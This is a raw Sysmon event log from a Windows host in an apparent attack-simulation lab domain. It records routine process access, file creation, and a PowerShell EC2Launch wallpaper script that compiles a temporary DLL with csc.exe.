13:58:49.570{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.570{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.476{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:49.476{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.476{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.007{59A5CD1D-9418-6005-1905-00000000A301}63406376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:58:50.726{59A5CD1D-941A-6005-1B05-00000000A301}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\1xemtzqb\1xemtzqb.dll2021-01-18 13:58:50.460 10341000x800000000000000013470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.663{59A5CD1D-9416-6005-1405-00000000A301}69286972C:\Windows\system32\conhost.exe{59A5CD1D-941A-6005-1C05-00000000A301}6700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.663{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:50.663{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.663{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:50.663{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.663{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-941A-6005-1C05-00000000A301}6700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:50.663{59A5CD1D-941A-6005-1B05-00000000A301}67326728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{59A5CD1D-941A-6005-1C05-00000000A301}6700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.666{59A5CD1D-941A-6005-1C05-00000000A301}6700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 
"/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESE498.tmp" "c:\Users\Administrator\AppData\Local\Temp\1xemtzqb\CSC6DC6EA1A7F3C4393BD2BABA6A13096BE.TMP"C:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{59A5CD1D-941A-6005-1B05-00000000A301}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\1xemtzqb\1xemtzqb.cmdline" 10341000x800000000000000013462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.507{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.507{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:50.507{59A5CD1D-9416-6005-1405-00000000A301}69286972C:\Windows\system32\conhost.exe{59A5CD1D-941A-6005-1B05-00000000A301}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.491{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:50.491{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.491{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:50.491{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-941A-6005-1B05-00000000A301}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.491{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:50.491{59A5CD1D-9417-6005-1505-00000000A301}69963152C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-941A-6005-1B05-00000000A301}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\db79b1cc2b753cce16ad58d141a194ca\Microsoft.PowerShell.Commands.Utility.ni.dll+2980(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\db79b1cc2b753cce16ad58d141a194ca\Microsoft.PowerShell.Commands.Utility.ni.dll+2980(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+6e1f8357(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+6e1d4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+
6e1d3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+6ec85466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+6e194997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+6e1f2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+6e1d64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+6e1d64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+6e1d6644(wow64)|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll+46fd1 154100x800000000000000013453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.467{59A5CD1D-941A-6005-1B05-00000000A301}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\1xemtzqb\1xemtzqb.cmdline"C:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "Import-Module 
"C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Ec2Launch.psd1"; Set-Wallpaper -Initial" 11241100x800000000000000013452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.460{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\1xemtzqb\1xemtzqb.cmdline2021-01-18 13:58:50.460 11241100x800000000000000013451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:58:50.460{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\1xemtzqb\1xemtzqb.dll2021-01-18 13:58:50.460 10341000x800000000000000013474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:51.601{59A5CD1D-93F9-6005-F204-00000000A301}42963788C:\Windows\system32\sihost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+386f0|C:\Windows\System32\modernexecserver.dll+2ff00|C:\Windows\System32\modernexecserver.dll+1e81d|C:\Windows\System32\modernexecserver.dll+1e514|C:\Windows\System32\modernexecserver.dll+49142|C:\Windows\System32\modernexecserver.dll+14a47|C:\Windows\SYSTEM32\ntdll.dll+3a950|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:51.460{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:51.460{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 